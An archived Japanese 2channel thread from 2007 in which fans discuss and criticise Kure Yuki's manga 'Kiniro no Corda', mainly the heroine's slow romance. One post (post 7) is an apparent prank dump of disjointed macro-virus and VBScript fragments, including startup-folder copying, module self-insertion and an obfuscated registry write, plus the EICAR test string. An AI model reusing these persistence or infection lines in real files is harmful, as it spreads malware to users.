2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆★金色のコルダ★☆呉由姫 part40

1 :花と名無しさん:2007/11/25(日) 17:17:22 ID:LkjTOVr80
呉由姫さんの作品をマターリ語りましょう。

・ここでのネタバレ話解禁は本誌発売日(基本24日)の正午から。
・このスレでのゲーム・アニメのネタバレは厳禁です。
 バレを含む漫画話題は総合スレ(下記参照)にてお願いします。
・作者叩き、キャラ叩き、住人叩きは禁止です。荒らしは徹底放置。
・チャット状態の雑談はご遠慮ください。
・次スレ立ては>>970

前スレ
☆★金色のコルダ★☆呉由姫 part39
http://anime2.2ch.net/test/read.cgi/gcomic/1192720946/


漫画の早売りバレ・マターリ雑談に関しては難民のスレへ
金色のコルダ総合 ♯14
http://ex20.2ch.net/test/read.cgi/nanmin/1195879878/

ゲームに関しては女向ゲー一般のスレへ
乙女@【金色の】金色のコルダ70【(゚Д゚)ゴルァ!!】
http://game14.2ch.net/test/read.cgi/ggirl/1191603255/

アニメに関してはアニメのスレへ
金色のコルダ〜primo passo〜 24弦目
http://anime2.2ch.net/test/read.cgi/anime2/1187953918/

2 :花と名無しさん:2007/11/25(日) 17:52:39 ID:???0
>>1
乙ィガーヌ

3 :花と名無しさん:2007/11/25(日) 18:01:10 ID:???0
>>1
乙いんだよ、お前

4 :花と名無しさん:2007/11/25(日) 20:06:22 ID:???0
>>1
オツカツサンドぉー!!!!


5 :花と名無しさん:2007/11/25(日) 20:14:43 ID:???0
>>1
乙ー

6 :花と名無しさん:2007/11/25(日) 20:34:56 ID:???0
>>1
乙ィゴネルワイゼン

7 :花と名無しさん:2007/11/25(日) 21:45:08 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


8 :花と名無しさん:2007/11/26(月) 06:20:19 ID:???0
▲     ▲
\\_//
 (o‘ω‘o) >>1オッチュー!!!

9 :花と名無しさん:2007/11/26(月) 19:26:41 ID:???0
月森が弦を張り替えて香穂子に返すコマ、
どうみても分数ヴァイオリンにしかみえないぞwww

10 :花と名無しさん:2007/11/26(月) 20:24:36 ID:???0
>>1
乙なのだ!

11 :花と名無しさん:2007/11/26(月) 21:08:08 ID:???0
>>1乙です

今月号読んだ。
前からそんな気はしてたけど、恋愛は月森だろうな
早く恋する香穂子が見たい

12 :花と名無しさん:2007/11/26(月) 21:16:31 ID:???0
「君にとってそれは意味のあることなんだろう?」と言われた時の表情は恋する表情に見えないこともなかった
ただ最近はああいう表情自体が多いんで特別なのかどうか判別がつかないんだよな

13 :花と名無しさん:2007/11/26(月) 21:16:50 ID:???0
>>1

前スレ>>1000
そうなればいいな。無理っぽいがw

14 :花と名無しさん:2007/11/27(火) 09:19:38 ID:???O
>>12
なんかもう無意識に惚れちゃってますな印象だ最近の香穂子は

でも最近尖ってばかりの口元はあんま可愛くないな

15 :花と名無しさん:2007/11/27(火) 12:15:07 ID:???O
前に香穂子が月森のどこに惚れるのかわからんと言ってた人がいたが
月森に惚れるんならここ数ヶ月の香穂子の気持ちを汲んでくれてる部分なんじゃないかと思う
唐突に腕つかんでヴァイオリン大好き宣言したり涙ぐむくらい嬉しかったようだし
あと音楽に惹かれてるのは言うまでもなく

16 :花と名無しさん:2007/11/27(火) 13:14:36 ID:???0
逆の月森が香穂子を・・・の方が分からんな
フォローのしようがない
あえていうなら魔法のヴァイオリン時代の両院に似ている音色?くらいか

17 :花と名無しさん:2007/11/27(火) 13:49:45 ID:???O
確かに逆の方がわからんw
まあ自覚してる二人だってよくわからん理由だけどな
香穂子の自覚が先に来ればおもしろいのに

18 :花と名無しさん:2007/11/27(火) 15:06:25 ID:???O
惚れた理由も雰囲気で分かって下さいってことで…w

19 :花と名無しさん:2007/11/27(火) 18:07:24 ID:???0
今までもそんな感じだったしねw

20 :花と名無しさん:2007/11/27(火) 21:01:11 ID:???0
前スレ1000の願いがw

21 :花と名無しさん:2007/11/27(火) 21:47:24 ID:???0
1の終わりはまだ折り返し地点くらいだったりするんだろうか…
こんな遅々として人間関係の進まないだらだら展開が同じくらい続くと思うと…
イラストブックで恋愛も動きますとか言ってたがどこらが動いてるのかさっぱり


22 :花と名無しさん:2007/11/27(火) 21:51:16 ID:???0
どうでもいいけど「日野の悪夢」で真っ先に香穂子の事思い浮かんだ

23 :花と名無しさん:2007/11/27(火) 22:50:30 ID:???0
あれ・・?もう全国でララ発売されてる・・よね?
すごい過疎っているような気がするんだけど・・

24 :花と名無しさん:2007/11/27(火) 22:53:39 ID:???0
語る事が…

25 :花と名無しさん:2007/11/28(水) 00:05:04 ID:???0
既に総合で語り尽くしたしなあ…

26 :花と名無しさん:2007/11/28(水) 00:28:15 ID:???0
漫画の時期が2に繋がるかというところだし
ここじゃゲーム話が出来ないから総合に流れやすい
過疎化するのはある意味当然というか

27 :花と名無しさん:2007/11/28(水) 00:38:41 ID:???0
総合でもそんな盛り上がってたっけ?
KYな音楽オタが降臨してただけなような…
まあ特に盛り上がる要素もない展開だし。直前の弦張り替えという斜め下はあったけど



28 :花と名無しさん:2007/11/28(水) 00:47:10 ID:???0
呉さん叩きすれば盛り上がるよ

29 :花と名無しさん:2007/11/28(水) 01:03:35 ID:???0
最終セレにきて月森が急激に変化してるわけだが何がきっかけなんだ
何か理由があったようには見えないんだけど…それどころか
認められない以降香穂子がとった行動と言えばいいかげんにお茶濁して逃げただけなのに

30 :花と名無しさん:2007/11/28(水) 01:29:00 ID:???0
きっかけは作者側の都合以外考えられない

31 :花と名無しさん:2007/11/28(水) 01:36:02 ID:???0
月森の急変はアニメでもそうだった。
せめて「君を認められない」の時に魔法のヴァイオリンのことがバレていたら
状況は違っていたような気がするんだけどな

32 :花と名無しさん:2007/11/28(水) 01:46:41 ID:???0
なんつか、「認められない」という台詞自体よく分からなかった

33 :花と名無しさん:2007/11/28(水) 01:53:27 ID:???0
コンクール終わってからも月森と会話ありそうだし魔法のヴァイオリン関係補完してくれないかな…
呉さんの中ではすでに終わったことなようだから無理っぽいけど

34 :花と名無しさん:2007/11/28(水) 03:39:00 ID:???O
>>33
どんな風に補完してほしいんだ?

35 :花と名無しさん:2007/11/28(水) 03:41:02 ID:???0
君を認められないというからには
それまでは香穂子を認めてたのかな>月森

36 :花と名無しさん:2007/11/28(水) 07:45:18 ID:???O
合宿での合奏の音を意識してたからやましいところがありそうな態度とられると納得いかなかったんじゃないの
そんな香穂子の音を意識してる自分はなんなんだとなるから

37 :花と名無しさん:2007/11/28(水) 08:37:18 ID:???0
>>35
キャラブックによれば認め合いつつあったようだが

38 :花と名無しさん:2007/11/28(水) 08:47:09 ID:???O
それも分からんな
月森ってもっと他人に要求するレベルが高そうなのに

39 :花と名無しさん:2007/11/28(水) 12:07:19 ID:???O
>>38
そういう月森が香穂子の言動を受け入れるようになるとこが要なのでは
描き方によっては痛い流れになってしまうけど

40 :花と名無しさん:2007/11/28(水) 13:07:48 ID:???O
月森が自覚するのはまだ先のことだろうからこれから描かれると思いたい…

41 :花と名無しさん:2007/11/28(水) 19:16:26 ID:???0
たぶん月森なんだろうけどだとしたら土浦と元カノに眉間の皺自覚してたのは
ただのひっかけだったんだろうか。月森一直線になるのをぼかすためのミスリードか?
土浦カワイソス

42 :花と名無しさん:2007/11/28(水) 19:29:47 ID:???0
いざとなるとゴミでも惜しくなるという心理です

43 :花と名無しさん:2007/11/28(水) 20:06:58 ID:???0
どっちにしてもあのシーンって必要あったのか?
土浦ならあまりに唐突だし(眉間に皺のところ以外でも気にしまくってて違和感あった)
月森ならあんなわざとらしいフェイク入れるなと

44 :花と名無しさん:2007/11/28(水) 20:14:40 ID:???0
もう何を描いてもわざとらしく見えるのがデフォなんじゃ…

45 :花と名無しさん:2007/11/28(水) 20:34:57 ID:???0
それぞれのキャラに全く気がないような描き方はできないんじゃない?
何せネオロマだし、一応どのキャラにもドキドキさせたり多少気にかけさせたりしてるんじゃ

46 :花と名無しさん:2007/11/28(水) 20:55:13 ID:???0
志水にときめいてたことあったっけ?

47 :花と名無しさん:2007/11/28(水) 21:03:37 ID:???0
ときめいたのとは違うかもしれないけど
天使の微笑みに赤くなってはいたよね

48 :花と名無しさん:2007/11/28(水) 21:10:46 ID:???0
膝枕して無反応なくらいだからまったく意識はしてないんだろう
誰にでも赤面したりどきどきしたりされるのはむしろ嫌だ
アニメの特別編みたいなことやったらそれこそ叩かれるだろw

49 :花と名無しさん:2007/11/28(水) 22:05:40 ID:???O
志水は「先輩の音」を言わせるために存在してるようなもんだ

「すっごく嬉しいかも」と個人的に微妙な言い回しだったが

50 :花と名無しさん:2007/11/28(水) 22:08:09 ID:???0
志水の扱い方はもうちょっとどうにかならないのか
「先輩の音」がどうとか言う度に萎える

51 :花と名無しさん:2007/11/28(水) 22:10:24 ID:???0
なぜ素直にすっごく嬉しいと言えないのか

52 :花と名無しさん:2007/11/28(水) 22:15:55 ID:???0
それが香穂子なんだよ

53 :花と名無しさん:2007/11/28(水) 23:28:17 ID:???0
嬉しいとか楽しいとか思うときに「かも」つけなくていいよ

54 :花と名無しさん:2007/11/28(水) 23:30:26 ID:???0
あんまり賢そうな印象は与えないな

55 :花と名無しさん:2007/11/28(水) 23:58:26 ID:???0
さすがバカ女

56 :花と名無しさん:2007/11/29(木) 00:15:44 ID:???0
しかし、あの「かも」ってのも一時期連発されてただけで今は消えてるな
やはり呉さん自身が気に入ったものをその時その時に使ってる
というような感じなのだろうか
例の手は長く続いてるみたいだからよほど好きなのか

57 :花と名無しさん:2007/11/29(木) 09:44:31 ID:???0
かもねかーもねそーかもね くせらなっちゃうかもっねー

58 :花と名無しさん:2007/11/29(木) 18:42:27 ID:???0
少年隊だっけ?

59 :花と名無しさん:2007/11/29(木) 19:07:02 ID:???0
シブガキ隊だろw

60 :花と名無しさん:2007/11/29(木) 19:12:18 ID:???O
絶対自覚するんだろうけど呉さんの月森が自覚するところが想像できない
やたらと香穂子を気にするようになってるんだけどそれでもあの月森が香穂子に惚れるところはなかなか想像しがたい

61 :花と名無しさん:2007/11/29(木) 20:27:30 ID:???0
自覚なんてもういつしてもおかしくないと思っている
やたら軟化してるし
その延長であっさり自覚しそう

62 :花と名無しさん:2007/11/29(木) 20:44:28 ID:???0
デレるにしても、そこに行くまでの過程が読みたいよ呉さん。

63 :花と名無しさん:2007/11/29(木) 20:45:50 ID:???0
でも月森自覚は時期的にはまだ先だと思うよ
コンクールも終わってまた新たに仕切りなおすわけだし当分引っ張るでしょ

64 :花と名無しさん:2007/11/29(木) 20:47:58 ID:???0
仕切り直しが必要なほど複雑な内容じゃないけどな

65 :花と名無しさん:2007/11/29(木) 20:52:35 ID:???0
呉さん的には『複雑』だと思っているんじゃね?

66 :花と名無しさん:2007/11/29(木) 21:39:03 ID:???0
本当に一部完とかじゃなくて、そのままだらだらと2へ続くのか?
羅列でも最終セレとは思えないほど盛り上がらないと言われてるくらいなのに

一度終わらせて仕切り直ししない限り、てこ入れは難しいと思う

67 :花と名無しさん:2007/11/29(木) 21:48:03 ID:???0
具体的にどう仕切りなおすんだ
原作なんてどう考えても現実的じゃないし
休載したところでよくなるかというとそれもかなり疑問

68 :花と名無しさん:2007/11/29(木) 21:56:08 ID:???0
もう後戻り出来ない所まで行っちゃってる感じだからなぁ

69 :花と名無しさん:2007/11/29(木) 21:57:51 ID:???0
10巻で一部完。
でいいんじゃね?

70 :花と名無しさん:2007/11/29(木) 21:58:23 ID:???0
セレが終わって、「これから音楽と一緒に頑張る!」で最終回でいいよ。
いろいろ中途半端なのは修復不能なんだし。
伏線がひろわれなくても、打ち切りになってもらって構わないくらいだ。

71 :花と名無しさん:2007/11/29(木) 21:59:50 ID:???0
>>69
永遠に二部は来ないんだよなwww

72 :花と名無しさん:2007/11/29(木) 22:01:11 ID:???0
「金色のコルダ 第一部ガモウ編完」

73 :花と名無しさん:2007/11/29(木) 22:02:52 ID:???0
>>70
本当に打ち切りの方が傷は浅いって気がしてきた

74 :花と名無しさん:2007/11/29(木) 22:12:05 ID:???0
回収していない伏線なんてあったっけ?

伏線自体、張ってもすぐに回収するから
複雑な伏線は無いと思うけど

75 :花と名無しさん:2007/11/29(木) 22:17:34 ID:???0
月森が土浦の元カノを気にしてた件
火原が香穂子が月森を好きだと誤解してる件

この辺は覚えてる

76 :花と名無しさん:2007/11/29(木) 22:28:02 ID:???0
>月森が土浦の元カノを気にしてた件

あ・・・あれって伏線だったのか
呉さんのことだからその場のフィーリングか何かかって思ってたよ
その後土浦に聞こうとしてたし、まだまだ引っ張るつもりなのかな

77 :花と名無しさん:2007/11/29(木) 22:39:28 ID:???O
土浦が月森に構うのは
月森の音楽に興味があるのと香穂子がほっとかないからで
月森の恋愛感情が香穂子に向きだしたら果たしてどうなるかな

78 :花と名無しさん:2007/11/29(木) 22:45:29 ID:???0
また襟首つかんで脅すんじゃないの

79 :花と名無しさん:2007/11/29(木) 23:10:35 ID:???O
前のは荒っぽかったけど脅してはいないんじゃないか?

80 :花と名無しさん:2007/11/29(木) 23:48:57 ID:???O
どう見ても、月森てめえ
ひとの女になにしやがったって感じに見えるが

81 :花と名無しさん:2007/11/29(木) 23:53:17 ID:???0
土浦の勘違いぶりもどこまで行くか見もの
なんかそのうち香穂とか呼び出しそうw


82 :花と名無しさん:2007/11/29(木) 23:55:49 ID:???0
>>81
土浦ENDになれば香穂って呼ぶよ。


83 :花と名無しさん:2007/11/30(金) 00:50:28 ID:???0
某TVで、ある漫画家の事を
「絵は雑だけど、作品に対しての愛情を感じる絵だね」と言っていた。
呉さんの絵って劣化したとはいえ、綺麗なのかもしれないけど、
作品への愛情を感じる絵ではないなぁ。描くことで精一杯な感じ。

84 :花と名無しさん:2007/11/30(金) 01:48:21 ID:???0
>>83
もしかしてさっきまで私も見てたあの番組だろうか。違うかな…
音楽で人間関係を描く、人間関係で音楽を描くとかのコメントに
コルダを思ってちょっと悲しくなったw

85 :83:2007/11/30(金) 01:58:45 ID:???0
>>84
そうだよw
ホントあの番組のコメントを聞いていて、コルダを思い出して悲しくなったよ。

86 :花と名無しさん:2007/11/30(金) 07:39:57 ID:???O
>>82
このままだと勝手に呼び出しかねないって意味なんだが

87 :花と名無しさん:2007/11/30(金) 07:49:05 ID:???0
>>86
頭に手を乗せながら「香穂」と呼んで
香穂子ぽかーんて感じ?www

88 :花と名無しさん:2007/11/30(金) 08:10:34 ID:???O
痛すぎるからやめてくれ…

89 :花と名無しさん:2007/11/30(金) 08:28:38 ID:???O
俺のことは梁太郎でいいぜ(親指を立てながら)

90 :花と名無しさん:2007/11/30(金) 08:35:00 ID:???0
>>83、84
それってのだめじゃないの?自分はそう思ったんだけど

91 :花と名無しさん:2007/11/30(金) 08:35:47 ID:???0
>>89
香穂子「だが断る」

92 :花と名無しさん:2007/11/30(金) 08:37:43 ID:???0
>>90
音楽漫画だし、確かに絵は雑だから自分もそう思った

93 :花と名無しさん:2007/11/30(金) 09:14:38 ID:???O
確かに土浦って、自分が香穂子への気持ちを自覚した段階で、
既に両想いだと勘違いしそうなタイプに見えるのは何故だろう?
火原みたいに悩んだりとかは絶対しなさそうだ。

つか「俺が好きなんだから、お前も俺の事好きだよな」とか言いながら
両肩掴んで香穂子の首がもげそうな位ガシガシ揺らしそうw

94 :花と名無しさん:2007/11/30(金) 10:23:49 ID:???0
>>93
土浦怖すぎww

95 :花と名無しさん:2007/11/30(金) 13:13:42 ID:???O
流行りのヤンデレ要素かw
たしかに異常なまでの余裕ぶり
別に全然余裕ないのにねw

96 :花と名無しさん:2007/11/30(金) 14:43:17 ID:???0
のだめはキャラが生きてる
コルダは無理に生かされてる感じ・・

絵が丁寧で綺麗=キャラに命が入るわけじゃないから
顔や身体のバランス、言動がおかしいのも気にならないくらいの
パワーをキャラに吹き込めれば良いと思う

97 :花と名無しさん:2007/11/30(金) 15:25:09 ID:???O
何よりもパワーや勢いを感じないんだよなーコルダの場合
だから呉さんのやる気を疑われてるんだろう

98 :花と名無しさん:2007/11/30(金) 19:53:07 ID:???0
まあ、のだめと比べるのはかわいそうだよ
あちらは本格的なクラシック漫画、こちらは(ry

99 :花と名無しさん:2007/11/30(金) 20:00:21 ID:???0
漫画の内容云々ではなく、
キャラ自体がのだめのようなパワーが無いという事では?

100 :花と名無しさん:2007/11/30(金) 20:09:18 ID:???0
のだめと比べてどうかは知らないがパワーがないのは目が死んでるからじゃw

101 :花と名無しさん:2007/11/30(金) 20:13:11 ID:???0
頼れる仲間はみんな目が死んでる
音楽にかけた青春 でもみんな目が死んでる

102 :花と名無しさん:2007/11/30(金) 20:22:31 ID:???0
どうでもいいからいいかげん香穂子に恋愛してほしい
10冊もやっといて主人公がまったく恋愛しないってすごいな
ゲームみたいに男が一方的に愛の言葉w囁いてればそれで満足な読者が多いんだろうか

103 :花と名無しさん:2007/11/30(金) 20:54:24 ID:???0
香穂子の恋愛希望する人多いんだねぇ

104 :花と名無しさん:2007/11/30(金) 21:06:20 ID:???0
少女漫画だし他に何を望むんだ?
恋愛要素なしで面白い少女漫画はあるけどコルダはその類じゃないでそ

105 :花と名無しさん:2007/11/30(金) 21:12:09 ID:???0
でもセレ中はまずヴァイオリンでしょ。
ヘタクソになったんだから。
それでもほんのりドキドキきゅんきゅんぐらいあってもいいよね。
アニメ特別変みたいなのは勘弁だけど

106 :花と名無しさん:2007/11/30(金) 21:21:47 ID:???0
香穂子の下手さを批判するのはいいけれど
そのついでに音楽の誤解広めるのやめてくれよ
別に自分は呉さんがちゃんとした音楽漫画を描いてるなんて思って無いし擁護もして無い

コルダ批判にたまに何故か「音楽と恋愛はこうあるべきだろ?」がついててその「こうあるべきだろ」が
全然間違ってる事が多いんだよ、その部分を「間違ってるからさもそれが正しいかのように言うな」と

間違った「こうあるべきだろ」がくっついておらず、コルダ漫画批判だけしてるんじゃないの?

107 :花と名無しさん:2007/11/30(金) 21:22:31 ID:???0
恋愛というか、香穂子が恋してるところは見たいかな、とは思う

でも、やっぱり練習してないところを見ると
珠玉EDにはなりえないな、と思うというかなんというか

つまり漫画の香穂子はかなり微妙だ

108 :花と名無しさん:2007/11/30(金) 21:24:27 ID:???0
>>106
総合で長文書いてた人?
2次元に必死すぎる
漫画と現実をもっと切り離してみたら?

109 :花と名無しさん:2007/11/30(金) 21:24:27 ID:???0
呉さんの描写だと恋すると漏れなく痛い子になっちゃいそうでなぁ
今でさえ批判の多い香穂子なのに恋したらどうなるやら

110 :花と名無しさん:2007/11/30(金) 21:25:40 ID:???0
>>106
またおまえかw

111 :花と名無しさん:2007/11/30(金) 21:39:32 ID:???0
>>106
文章いつも一緒だからすぐ分かるよ^^

112 :花と名無しさん:2007/11/30(金) 21:40:02 ID:???0
恋愛のないコルダ漫画は永久に不滅です!

113 :花と名無しさん:2007/11/30(金) 21:41:38 ID:???0
香穂子が恋愛モードになるとどういう風になるのか単純に興味があるw


114 :花と名無しさん:2007/11/30(金) 21:53:20 ID:???0
主人公と、月森と、柚木の恋愛モードは想像つかない

115 :花と名無しさん:2007/11/30(金) 21:54:15 ID:???0
志水も

116 :花と名無しさん:2007/11/30(金) 21:57:10 ID:???0
土浦も

117 :花と名無しさん:2007/11/30(金) 22:01:46 ID:???0
火原は?

118 :花と名無しさん:2007/11/30(金) 22:02:41 ID:???0
土浦は勘違いして暴走という悲惨な結果がすでに出てるw

119 :花と名無しさん:2007/11/30(金) 22:13:58 ID:???0
さて、特攻隊員一番手は誰だろうな

120 :花と名無しさん:2007/11/30(金) 22:15:05 ID:???0
そりゃ火原だろ
火原が散ったら無茶しやがってのAAで追悼してやる

121 :花と名無しさん:2007/11/30(金) 22:20:37 ID:???0
2に突入するというのにもう玉砕かと思うとせつねぇなぁ、オイw

122 :花と名無しさん:2007/11/30(金) 22:25:35 ID:???0
当分は玉砕しないだろ
告白しようとしてたのをいったんリセットさせたんだし無駄に引っ張るにきまってる


123 :花と名無しさん:2007/11/30(金) 22:40:41 ID:???0
火原は玉砕しても「これからもいい友達でいたい」とか言いそうだからなぁ・・・

124 :花と名無しさん:2007/11/30(金) 23:25:31 ID:???0
その場は明るくふるまって後で大泣きしそうだ

125 :花と名無しさん:2007/11/30(金) 23:31:46 ID:???0
空鍋やらかすぞ

126 :花と名無しさん:2007/11/30(金) 23:34:43 ID:???0
ちゃんと告白→失恋というところまで描いてくれれば御の字だな
適当にお茶濁されそうだ。ネオロマには攻略キャラを振っては
いけないとかいうくだらないルールがあるらしいし

127 :花と名無しさん:2007/11/30(金) 23:51:45 ID:???0
結果のわかってる告白なんて

128 :花と名無しさん:2007/12/01(土) 00:05:02 ID:???O
不憫な…

129 :花と名無しさん:2007/12/01(土) 00:10:48 ID:???0
そういう意味じゃまだ土浦のほうが盛り上がりそう

130 :花と名無しさん:2007/12/01(土) 00:28:22 ID:???0
じゃあ応援してやらねばw

131 :花と名無しさん:2007/12/01(土) 00:30:20 ID:???0
勘違い野郎が報われるのも嫌なんで別に応援したくない

132 :花と名無しさん:2007/12/01(土) 00:37:49 ID:???0
香穂子と誰かがくっつきゃいいだろ
誰でもいいよ本当に
誰でも応援してやるよw

133 :花と名無しさん:2007/12/01(土) 00:40:50 ID:???0
香穂子が誰かを好きになって頑張るところなら見たいし応援もするけどな
男が香穂子に夢中なのはもうわかったからいらない

134 :花と名無しさん:2007/12/01(土) 01:19:22 ID:???0
自覚組とくっつけるならこれ以上引き延ばすのやめてくれ…
セレクション終了後「私○○の事いつの間にか好きになってた −完−」でいいよ

135 :花と名無しさん:2007/12/01(土) 01:43:37 ID:???0
乙女ゲーにありがちな男→女主人公じゃなくて
香穂子→男キャラで振り向いてもらうが見たい。

136 :花と名無しさん:2007/12/01(土) 10:24:25 ID:???0
香穂タソの入浴シーンはまだですか?

137 :花と名無しさん:2007/12/01(土) 10:32:05 ID:???0
ハァ?

138 :歌ってみました:2007/12/01(土) 10:53:57 ID:???0
きんいろ〜の〜
コールーダ〜

139 :花と名無しさん:2007/12/01(土) 11:32:28 ID:???0
主人公嫌いだからぶっ殺してほしい

140 :歌ってみました:2007/12/01(土) 11:44:06 ID:???0
ラララーラララ〜

141 :花と名無しさん:2007/12/01(土) 16:15:52 ID:???O
今月号をやっと読んだんだけど、第一印象が
月森が探すと香穂子が見つかり、香穂子が探すと月森が見つかる
この二人に関しては、初期からこれが徹底されてる
他のキャラだと、そういうシチュエーションは無い気がする

142 :花と名無しさん:2007/12/01(土) 18:04:54 ID:???O
>>141
思い返してみると確かにそうだな。
そう言った点だけはぶれずに徹底してるのか。

143 :花と名無しさん:2007/12/01(土) 18:16:14 ID:???0
徹底というよりワンパタなのでは
そもそも他のキャラが香穂子を探すようなシーンってないし

144 :花と名無しさん:2007/12/01(土) 19:17:29 ID:???0
香穂子の音楽面やターニングポイントに必ず月森が関わるのと
香穂子がやたらと月森に構って世話焼こうとするっていう
二つからきた結果じゃないの?

145 :花と名無しさん:2007/12/01(土) 19:28:05 ID:???0
>>142
他のキャラは「偶然会う」に頼ってるのにな

146 :花と名無しさん:2007/12/01(土) 19:34:21 ID:???0
いや月森と香穂子も会うのは結構偶然に頼ってるよw
「月森の演奏にだけは他と違う反応する」とかならガチだろうけど

147 :花と名無しさん:2007/12/01(土) 19:38:04 ID:???0
香穂子って月森の演奏には興味ありありで大好きらしいが
音楽そのものに本当に興味や熱意があるんだろうか

148 :花と名無しさん:2007/12/01(土) 19:47:35 ID:???0
>>141
やっぱり最初の頃から月森でいこうって決まってたのかなw

149 :花と名無しさん:2007/12/01(土) 20:01:09 ID:???0
>>147
ないように見えるがあることになっているらしい

各キャラに対する最終セレでの香穂子の反応

柚木:内面の些細な変化には気付かず小さなコマで笑って拍手。コメントは特になし
月森:最初に会った頃のやりとりを思い出す。大ゴマで目を見開くこと二回
    「流れるようなきれいな旋律…穏やかな優しい音楽…」
    コメントは微妙にいいづらそうに?「「あ…すごく…ステキだった」
志水:志水の潜在能力についての話を金やんから聞く。小さくワンカット入る。コメントは特になし
土浦:ピアノを続けるべきだというモノローグ。演奏に対する反応は特になし
    コメントは「うん、さっすが」
火原:聞いてはいるんだろうが完全にスルー
冬海:途中で立ち去る

やっぱり月森がダントツの反応だけど言われた言葉を香穂子が反芻してたり、
(お前もだろ?とか君にとって意味のあることなんだろう?とか)
演奏に割くページの多さからしてLRが目立つなと思った

150 :花と名無しさん:2007/12/01(土) 20:08:04 ID:???0
>「うん、さっすが」

(ノ∀`)

151 :花と名無しさん:2007/12/01(土) 20:13:03 ID:???0
火原に比べたら…
そういえば月森に感想言うとき照れたような言いよどむようなかんじだったのはなんでだろ

152 :花と名無しさん:2007/12/01(土) 20:17:52 ID:???0
最終セレなんだからもう少し違う反応してやれと言いたい・・・


153 :花と名無しさん:2007/12/01(土) 20:25:55 ID:???0
「穏やかな優しい音楽…」 は、月森がデレ期に入ってから出る音だと思ってた

154 :花と名無しさん:2007/12/01(土) 20:27:41 ID:???0
月森がいつもとちょっとでも違う演奏したら反応するくせに自覚組の変化には全然気づかないんだな

155 :花と名無しさん:2007/12/01(土) 20:28:48 ID:???0
>>154
各キャラの音の変化と香穂子の反応が同期してないんだよな
そこにいつも違和感をおぼえる
男連中は相手によって気付いてる奴もちらほらいるようだけど

156 :花と名無しさん:2007/12/01(土) 20:32:33 ID:???0
「うん、さっすが」

土浦カワイソスw

157 :花と名無しさん:2007/12/01(土) 20:43:40 ID:???0
>>154
同じ楽器だからか?
でもそんなデリケートな変化まで聞き分けられるのか香穂子

158 :花と名無しさん:2007/12/01(土) 20:43:43 ID:???0
なんともいえない感想だったな、あれ<さっすが

159 :花と名無しさん:2007/12/01(土) 20:44:38 ID:???0
なんというか…さっすが呉さん

160 :花と名無しさん:2007/12/01(土) 20:47:06 ID:???0
もう言葉を捻り出す気もないってことなのか

161 :花と名無しさん:2007/12/01(土) 20:47:17 ID:???0
自覚してもいないのにこの反応なら月森が自覚したらどんな反応するのか楽しみだ


162 :花と名無しさん:2007/12/01(土) 20:48:09 ID:???0
どうせうまい、すごい、素敵の三種類しかないんだから同じこと

163 :花と名無しさん:2007/12/01(土) 20:53:32 ID:???0
担当、頼むから突っ込んでくれ

164 :花と名無しさん:2007/12/01(土) 20:56:34 ID:???0
月森の演奏を聴いていたときの乙女な顔を見た後で
土浦のときのさっすがな表情見ると妙におっさんくさく見えるw

165 :花と名無しさん:2007/12/01(土) 21:01:11 ID:???0
土浦がこっちに向かってくるのに気付いた時のωな口にいらつくw

166 :162:2007/12/01(土) 21:02:15 ID:???0
もう一個あった「よかった」が

167 :花と名無しさん:2007/12/01(土) 21:06:19 ID:???0
安い・早い・美味い

168 :!omikuji:2007/12/01(土) 21:29:04 ID:???0
     ↑来月号の面白さはコレ

169 :花と名無しさん:2007/12/01(土) 21:31:48 ID:???0
('A`)

170 :花と名無しさん:2007/12/01(土) 21:34:45 ID:???0
なんかあちこちで失敗している人を見かけるな今日は

171 :花と名無しさん:2007/12/01(土) 21:40:46 ID:???0
計測不能のおもしろさってことにしておこう

最近の月森に対する香穂子の態度や反応はやけに乙女だけど、
あれが香穂子の恋愛モードなんだとしたら初期と完全にイメージ違ってなんかなあ
恋愛すると急に乙女になるってのも…

172 :花と名無しさん:2007/12/01(土) 21:41:53 ID:???0
乙女になるのはいいが別人にならないでほしい

173 :花と名無しさん:2007/12/01(土) 21:44:19 ID:???0
個人的に、盛大に赤面するのが香穂子のイメージだったけど最近は全然違うもんな

174 :花と名無しさん:2007/12/01(土) 21:57:02 ID:???0
すっかり達観したかんじになっておとなしいかんじになっちゃったな
月森の演奏後に感想言った時とかも。どっちかというと冬海ちゃんのキャラに近いくらい

175 :花と名無しさん:2007/12/01(土) 22:02:37 ID:???0
妙に悟ったようなキャラだもんな今は

176 :花と名無しさん:2007/12/01(土) 22:04:45 ID:???0
>>174
確かに月森に感想言ったシーンは
1セレで香穂子にハンカチ差し出した冬海ちゃんに近いと思った

177 :花と名無しさん:2007/12/01(土) 23:13:59 ID:???0
来月は香穂子の演奏が終わる→順位発表の手前で終了とみたw

178 :花と名無しさん:2007/12/01(土) 23:45:15 ID:???0
次号の大半は走馬灯だったりしてな。
香穂子の演奏の感想は皆そろって「悪くない」とかw

179 :花と名無しさん:2007/12/01(土) 23:51:55 ID:???0
月森の言葉は何かあるんだろうけど「悪くない」じゃありませんようにw

180 :花と名無しさん:2007/12/02(日) 01:13:14 ID:???0
>>174
大人しくはなっても冬海ちゃんの演奏は聞かないんだなw
朝香穂先輩とか言われたのに…

181 :花と名無しさん:2007/12/02(日) 05:08:17 ID:???O
一回も聞いてないよな
まあ2のために無理やり香穂先輩とか呼ばせて仲良くなったように見せただけだろうからな
都合のいいときだけ利用される冬海ちゃんカワイソス

182 :花と名無しさん:2007/12/02(日) 08:42:11 ID:???0
